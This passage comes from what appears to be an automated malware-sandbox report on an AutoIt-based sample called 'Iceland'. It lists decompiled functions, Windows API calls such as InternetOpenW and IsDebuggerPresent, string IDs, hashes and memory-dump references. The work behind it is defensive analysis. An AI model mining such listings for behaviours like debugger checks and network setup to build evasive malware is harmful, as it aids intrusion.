                                                                                                                                                                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                                                • Opcode ID: 5d400ef9c9fb43bd482fd739e9ae22ebc9f300ac14b860040acb83ec9020bac1
                                                                                                                                                                                                                                                                • Instruction ID: 22cdf6f37a5f845165255743b726a6dcc7a345230452f3c0d9ccdb0d51d8f343
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d400ef9c9fb43bd482fd739e9ae22ebc9f300ac14b860040acb83ec9020bac1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A1190726002086FEF118F94DC81FEB3B6EEB853A4F104524F91997292DA719D5187A0
                                                                                                                                                                                                                                                                Function 00AB41AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A27873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A278B1
                                                                                                                                                                                                                                                                  • Part of subcall function 00A27873: GetStockObject.GDI32(00000011), ref: 00A278C5
                                                                                                                                                                                                                                                                  • Part of subcall function 00A27873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A278CF
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00AB4216
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000012), ref: 00AB4230
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                • String ID: static
                                                                                                                                                                                                                                                                • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                • Opcode ID: 05d1fa78d30012239f5bb13f096f960dfc9c1313ab2bc101edf5efe96714d0fa
                                                                                                                                                                                                                                                                • Instruction ID: 2c68d5371438042e1b3c28ccfe7700499a8adb6cea59b5854c69ded2a102f1f0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05d1fa78d30012239f5bb13f096f960dfc9c1313ab2bc101edf5efe96714d0fa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4811F372610209AFDB01DFB8CC45AFE7BB8EF08354F014A29F955E3252E675E851EB60
                                                                                                                                                                                                                                                                Function 00A9D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A9D7C2
                                                                                                                                                                                                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A9D7EB
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                • String ID: <local>
                                                                                                                                                                                                                                                                • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                • Opcode ID: 1e4dde3672b8ff7f9f5bc26bd71d4b8117599b62d2b0148a3bf1380ad58a247f
                                                                                                                                                                                                                                                                • Instruction ID: 879996a73d188ff36feca4e1ae9656c2a90aa2bd722ded3d7e6d3f48da38757f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e4dde3672b8ff7f9f5bc26bd71d4b8117599b62d2b0148a3bf1380ad58a247f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 071186717456327DDB344BE68C85EE7BEEDEB127A4F104226B50993180D6649880D6F0
                                                                                                                                                                                                                                                                Function 00A875ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,?,?), ref: 00A8761D
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A87629
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                • String ID: STOP
                                                                                                                                                                                                                                                                • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                • Opcode ID: 060fa9ade87427b4ab0a5bb68e6cf979f601759e1e56eb4a46157fdcdc1241b3
                                                                                                                                                                                                                                                                • Instruction ID: c79c056e7c5db43ee9247b99dfc323c573be90a06784678c5670c36df5435626
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 060fa9ade87427b4ab0a5bb68e6cf979f601759e1e56eb4a46157fdcdc1241b3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E018032A149268BCB20BFBDDD909BF77B5AB607A07600A34E42596291FB31D950D790
                                                                                                                                                                                                                                                                Function 00A8262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00A845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A84620
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A82699
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                • Opcode ID: 983df678e5d4555750e885b6f764783ee66a249ac4272a24f932eb5ad7ac88e7
                                                                                                                                                                                                                                                                • Instruction ID: c76686b6e8d36ccd9256b34f68e190896c4c13037a1ac1f0f8acbf2a5948aa82
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 983df678e5d4555750e885b6f764783ee66a249ac4272a24f932eb5ad7ac88e7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A01D475650225ABCB08FBA4CD51DFE7778FF56360B000A29B833972D1EB315808D760
                                                                                                                                                                                                                                                                Function 00A82525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00A845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A84620
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00A82593
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                • Opcode ID: 83df6594c8d7f0b16cfc4e327f464cbda06917aff44f384aa3fca799f991f5dd
                                                                                                                                                                                                                                                                • Instruction ID: 9eb43fffb49c755d0d963f91ce7d63780801039ff24efd87fe78abd86da702a3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83df6594c8d7f0b16cfc4e327f464cbda06917aff44f384aa3fca799f991f5dd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C01D675A90115BBCB08F7A4DA62EFF77A8DF55380F500029B913A7281EB159E08C7B1
                                                                                                                                                                                                                                                                Function 00A825A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00A845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A84620
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00A82615
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                • Opcode ID: b44c2f148d42aec5d10128ac4ae35321cc30c1db7c00416d9def83d0ebf6f01f
                                                                                                                                                                                                                                                                • Instruction ID: b23605f0694572b744398237c88e6f23fdd2cad5d9978ebfc38b326d02cc996e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b44c2f148d42aec5d10128ac4ae35321cc30c1db7c00416d9def83d0ebf6f01f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3901AD75A80115ABCB09F7A4DA12FFE77A8DB15380F500036B802A7282EA619E0897B1
                                                                                                                                                                                                                                                                Function 00A826B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00A845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A84620
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00A82720
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                • Opcode ID: 71b1a6d4f5cf7877bb4b251ebe2d14a2f172542349b54b0b96de7572d3272955
                                                                                                                                                                                                                                                                • Instruction ID: 24c62adda92952ae09fecbbbf1a372c622a1a18ea4f9e26fa524be48b23881ba
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71b1a6d4f5cf7877bb4b251ebe2d14a2f172542349b54b0b96de7572d3272955
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DF0A475A90225ABDB08F7A89D51FFE7778EF05790F400925B462A72C1EB615C088760
                                                                                                                                                                                                                                                                Function 00A81461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00A8146F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                • Opcode ID: a40a57654cef1b0cfa08b5b9add014f724eac5ba8ca73b317534610e5ba05554
                                                                                                                                                                                                                                                                • Instruction ID: 484d7ac9fa0de234ea294b667ace87dfb4c6fe35fe0a41b4a0c94a930e5982d8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a40a57654cef1b0cfa08b5b9add014f724eac5ba8ca73b317534610e5ba05554
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3CE0483624471577D2143798BD03FC97A889F05B55F114D2AF758A54C39EF224905399
                                                                                                                                                                                                                                                                Function 00A410B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A3FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A410E2,?,?,?,00A2100A), ref: 00A3FAD9
                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,00A2100A), ref: 00A410E6
                                                                                                                                                                                                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A2100A), ref: 00A410F5
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A410F0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                • Opcode ID: 6eddbf10321d97a87353b4ac4bc35a742cffd382311aac636cdb3fcbfe293cae
                                                                                                                                                                                                                                                                • Instruction ID: 0c42a5574bd303cd2d372d9866a456021c5c64d8f8d58231c747210cd61b86e6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6eddbf10321d97a87353b4ac4bc35a742cffd382311aac636cdb3fcbfe293cae
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AEE092746403508FD330DF68E904B42BFE4AF40304F008E2CE886C2652EBB4D484CB91
                                                                                                                                                                                                                                                                Function 00A939D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00A939F0
                                                                                                                                                                                                                                                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00A93A05
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                • String ID: aut
                                                                                                                                                                                                                                                                • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                • Opcode ID: b30539ccc76acb4e8e1e8f7b3b4456e7fccad0bdf455c7c080f64c148e7fa754
                                                                                                                                                                                                                                                                • Instruction ID: b1feeceef6fe9307c8ae08ebd935b47485e868cdfb8d5618feabe5b9f22f3bd1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b30539ccc76acb4e8e1e8f7b3b4456e7fccad0bdf455c7c080f64c148e7fa754
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BD05E7250036877DA20E7A59C0EFCB7E6CDB44750F0006A1BB55920A2EAB0DA86CB90
                                                                                                                                                                                                                                                                Function 00AB2DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AB2DC8
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00AB2DDB
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8F292: Sleep.KERNEL32 ref: 00A8F30A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                • Opcode ID: 2f4d22db52f16347f26fb143781db8f4dc342c33bbadc3d9c9049c4ab1f6edfa
                                                                                                                                                                                                                                                                • Instruction ID: 3a6f6aed35045e0926635b4241c4a69d9fe550eabb622642d154e40536441f38
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f4d22db52f16347f26fb143781db8f4dc342c33bbadc3d9c9049c4ab1f6edfa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BD02235394301BBE238F3B0AC0FFD67B10AF00B00F1009207309AA0E1E8E46802C750
                                                                                                                                                                                                                                                                Function 00AB2DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AB2E08
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000), ref: 00AB2E0F
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8F292: Sleep.KERNEL32 ref: 00A8F30A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                • Opcode ID: cf4fe74d7a0ed1aae12684fdc4e9c85fe7edbc2756336b616d7e09c5975c29ae
